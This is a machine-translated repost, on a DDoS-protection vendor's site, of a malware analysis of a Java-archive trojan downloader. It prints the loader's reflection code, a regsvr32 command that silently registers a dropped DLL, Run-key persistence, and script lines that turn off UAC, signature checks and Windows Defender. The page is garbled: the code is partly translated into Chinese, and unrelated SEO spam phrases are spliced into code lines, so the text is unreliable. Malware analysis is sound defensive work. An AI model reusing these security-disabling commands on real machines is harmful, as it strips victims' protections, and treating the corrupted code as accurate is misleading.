DDOS防御专家-提供超强DDoS高防/CC防护/大流量清洗服务!
当前位置:主页 > DDOS防御 > 正文

防御ddos_cdn防御cc攻击_秒解封

01-12 DDOS防御

防御ddos_cdn防御cc攻击_秒解封

旧的又是新的-恶意软件使用20年前的技术来逃避检测不管你怎么看网络犯罪分子,科技界肯定没有哪个角落能更好地拥抱快速创新,他们当然有动力。只有当恶意软件跨过多个障碍,绕过并避开我们的行业在他们面前设置的任何安全障碍,他们的回报才会出现。即便如此,他们仍然必须成功地让受害者在不知情的情况下合作安装有效载荷。有时旧的东西又是新的,成功意味着旧方法的复活,我们最近在VMRay检测到的使用Java存档的恶意软件中看到了这一点。JAR(javaarchive)是一种包文件格式。它可以作为Java库或独立应用程序使用。这可以追溯到互联网时代的早期,也就是说,1995年,当时,javaapplet首次由Sun引入,并被广泛用于为网站添加动画和交互性。这些Java小程序可以通过简单的代码片段嵌入到网站中,例如:本例中的代码段运行jarsrcloader.class当有人访问网站时。在Windows上,如果安装了java,可以通过双击来执行java归档。你可以看到这是怎么回事-让用户双击一个恶意的JAR文件,如果已经安装了Java(有89%的几率是这样),那么恶意软件作者几乎就不在家了。Duplicata0.jar分析我们收到的一个JAR示例名为Duplicata0.JAR。在分析的时候,cc防御关闭,它有一个适度的10/55检测到病毒总数。它在一个模糊的java文件上使用反射来执行。反射是计算机程序在运行时检查、反思和修改其自身结构和行为的能力。在本例中,Duplicata0.jar使用反射来混淆程序控制流。图1:JAR文件结构图1显示了JAR的文件结构。有一个清单文件和两个包。清单版本:1.0Rsrc类路径:/类路径:。Rsrc主类:dgerssdf.D0wnF1le主要班级:org.eclipse.jdt.内部.jarinjarloader.JarRsrcLoader清单文件(上面)显示入口点(主类)是JarRsrcLoader类。这个类中有一个代码片段,它使用反射从D0wnF1le类调用main方法: ClassLoader jceClassLoader=新的URLClassLoader(rsrcUrls,ddos攻击与防御电子书,null);线程.当前线程().setContextClassLoader(jceClassLoader);类滴管=类forName(mi.rsrcMainClass,美国高防cdn多久生效,true,jceClassLoader);方法callDropperMain=dropper.getMethod("main",新类[]{args.getClass() });调用调用(null,ddos云防御价格表,新对象[]{args});具体地说,类拖放器将D0wnF1le作为类从资源中加载。从那里,类拖放器指向方法main并用invoke命令调用它。此时,混淆的D0wnF1le开始运行。它下载三个文件:ljk32g1.txtljk32g2.txtljk32g4.txt从命令和控制服务器,以伪随机方式重命名它们,并将它们放入文件夹"C:\User\Public\"。除了第一个(ljk32g1.txt),这些看起来无辜的文本文件实际上是压缩的动态链接库(dll)。空头不是另一个,香港高防cdn节点,因为这不是另一个。作者如何运行这些恶意软件?答案可以在混淆的D0wnF1le代码的最后一行找到: 运行时.getRuntime()执行(cfUSD1730解密cfUSD1730("sjdipirjejjdgpgogkipjjpfvgljefvifx",1730加元CCODCFUSD1730)+1730加元Spastaraizcfusd1730+1730加元SNOMEMAQ5CFUSD1730+CFUSD1730解密CFUSD1730("OINGK",17000加元,共1730加元)+"加元+1730加元x 1700加元1730加元解密1730加元("OICFTFRFU",1730CCODCFUSD1730)+DC730CFD1730美元保险丝;当去模糊处理时如下所示:运行时.getRuntime()执行("regsvr32.exe/s"C:\\Users\\Public\\\\ljk32g-2.dll"#96";此命令以静默模式启动可执行regsvr32.exe,该模式将ljk32g-2.dll注册为服务。当这个DLL正在运行时,它将把第二个DLL(ljk32g-4.DLL)注入到资源管理器. 现在,恶意软件准备大肆破坏。首先,它写下命令:regsvr32.exe/s"C:\\Users\\Public\\\\ljk32g-2.dll"\96进入注册表中的HKEY\U CURRENT\U USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run(用于持久性)。这就保证了恶意软件在计算机重新启动后能够生存。恶意软件现在删除一个VBA脚本并运行它。此脚本禁用Internet Explorer下载的可执行文件的签名检查。它还禁用Windows Defender和任何Windows安全中心通知。okokCHAVE7.RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA"),0,("REG_DWORD")okokCHAVE7.RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\concerepPromptBehaviorAdmin"),0,("REG_DWORD")okokCHAVE7.RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop"),0,("REG\u DWORD")okokCHAVE7.RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download\checkexeignatures"),("否")okokCHAVE7.RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download\RunInvalidSignatures"),("00000001")okokCHAVE7.RegWrite("HKLM\Software\Microsoft\Security Center\AntiVirusDisableNotify"),00000001,("REG\u DWORD")okokCHAVE7.RegWrite("HKLM\Software\Microsoft\Security Center\UpdatesDisableNotify"),00000001,("REG\u DWORD")okokCHAVE7.run("sc config WinDefend start=disabled"),0之后,恶意软件将强制重新启动。接下来是另一个有趣的部分。如果重新启动完成,就不是恶意软件首先启动。取而代之的是受信任的Windows程序regsvr32启动恶意DLL,然后将代码注入其中资源管理器.exe比赛又开始了。图2:JAR恶意软件进程图我们可以在重启过程图中更清楚地看到这一点:图3:重启过程图结论这类恶意软件利用Java存档、代码注入和DLL的许多技巧来逃避检测。尽管如此,它在执行过程中留下了很多很容易被VMRay检测到的痕迹。我们可以在VTI中看到威胁结果:图4:JAR恶意软件VTI得分VMRay将Duplicata0.jar的得分定为94/100–绝对是非常恶意的!首先也是最重要的一点是,禁用Windows安全功能将始终被评为高度恶意。此外,我们还看到了其他典型的恶意软件行为:代码注入、持久性、分析规避、下载有效负载等等。这在很多方面都是一个普通的木马下载程序,感染的最终结果,无论是机器人还是勒索软件,都取决于当时下载的有效负载和指令。VTI分数的输出以STIX/CYBOX格式提供,用作IOCs。您可以在此处查看完整的VMRay Analyzer报告。相关链接://en.wikipedia.org/wiki/Java_小程序https://www.java.com/en/about/https://www.virustotal.com/de/file/a2b467819bd03974f8b4ac326d9d488eb80680ee43cea984e160922122f1f048/analysis/关于Ralf HundRalf博士于2013年在波鸿鲁尔大学获得计算机科学/信息技术安全博士学位。在他的研究期间,他专注于软件二进制文件的新分析方法,特别是恶意软件。他的研究成果发表在许多领先的学术IT安全会议上,并因杰出的工作而获得多个奖项。此外,拉尔夫还参与了一些沙盒技术的设计和开发。他在恶意软件研究方面拥有超过10年的经验,并在各种学术和工业会议上积极发言。他的特殊兴趣在于虚拟化技术及其在软件分析中的应用。

版权保护: 本文由 DDOS防御专家 原创,转载请保留链接: /ddos1/61254.html

DDoS防御专家简介孤之剑
国内资深白帽子二十人组成员,前BAT资深网络安全工程师,知名网络安全站点板块大神,每年提交Google及微软漏洞,原sina微博负载插件开发者,现在整体防御复合攻击长期接受1-4.7T攻击,CC防护自主开发指纹识别系统,可以做到99.9999%的无敌防御。
  • 文章总数
  • 8165513访问次数
  • 建站天数

    QQ客服

    400-0797-119

    X